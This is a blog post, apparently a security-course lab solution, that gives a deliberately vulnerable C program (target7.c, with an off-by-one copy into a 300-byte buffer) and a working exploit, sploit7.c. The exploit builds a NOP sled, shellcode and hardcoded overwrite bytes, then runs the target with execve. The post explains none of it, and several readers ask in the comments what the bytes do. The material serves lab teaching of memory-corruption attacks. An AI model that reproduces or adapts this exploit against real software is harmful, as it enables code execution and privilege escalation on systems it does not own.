Advertisements
Home > Information Technology, programming, Science, Security > Buffer Overflowing Target 7

Buffer Overflowing Target 7

target7.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

void nstrcpy(char *out, int outl, char *in)
{
 int i, len;

 len = strlen(in);
 if (len > outl)
  len = outl;

 for (i = 0; i <= len; i++)
  out[i] = in[i];
}

void bar(char *arg)
{
 char buf[300];

 nstrcpy(buf, sizeof buf, arg);
}

void foo(char *argv[])
{
 int *p;
 int a = 0;
 p = &a;

 bar(argv[1]);

 *p = a;

 _exit(0);
 /* not reached */
}

int main(int argc, char *argv[])
{
 if (argc != 2)
 {
  fprintf(stderr, "target7: argc != 2\n");
  exit(EXIT_FAILURE);
 }

 foo(argv);

 return 0;
}

sploit7.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "shellcode.h"

#define TARGET "/tmp/target7"

int main(void)
{
 char *args[3];
 char *env[1];
 int x = 300;
 char buf[x]; 
 int i;

 for(i = 0; i < x+1; i++){
  if(i<236-strlen(shellcode))
   buf[i] = '\x90';
  else if(i<236)
   buf[i] = shellcode[i-236+strlen(shellcode)];
  else if(i<292)
   buf[i] = '\x90';
  //for a
  else if(i<293)
   buf[i] = '\x0c';
  else if(i<294)
   buf[i] = '\xfc';
  else if(i<295)
   buf[i] = '\xff';
  else if(i<296)
   buf[i] = '\xbf';
 
  //for p
  else if(i<297)
   buf[i] = '\x24';
  else if(i<298)
   buf[i] = '\x97';
  else if(i<299)
   buf[i] = '\x04';
  else if(i<300)
   buf[i] = '\x08';
 
  else 
   buf[i] = '\x38';
 }
 
 args[0] = TARGET; args[1] = buf ; args[2] = NULL;
 env[0] = NULL;

 if (0 > execve(TARGET, args, env))
  fprintf(stderr, "execve failed.\n");

 return 0;
}
Advertisements
  1. Ritu
    April 12, 2011 at 10:21 pm

    Could you please let me know what following code is doing?

    does 0xbffffc0c = address of buf?
    0x08049724 = address of what instruction?
    0x38 = ?

    //for a
    else if(i<293)
    buf[i] = '\x0c';
    else if(i<294)
    buf[i] = '\xfc';
    else if(i<295)
    buf[i] = '\xff';
    else if(i<296)
    buf[i] = '\xbf';

    //for p
    else if(i<297)
    buf[i] = '\x24';
    else if(i<298)
    buf[i] = '\x97';
    else if(i<299)
    buf[i] = '\x04';
    else if(i<300)
    buf[i] = '\x08';

    else
    buf[i] = '\x38';

  2. Alex
    April 14, 2011 at 11:46 pm

    I would like to know the answer to these questions as well…. what is going on here?

  3. August 16, 2011 at 10:45 am

    me too

  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s

%d bloggers like this: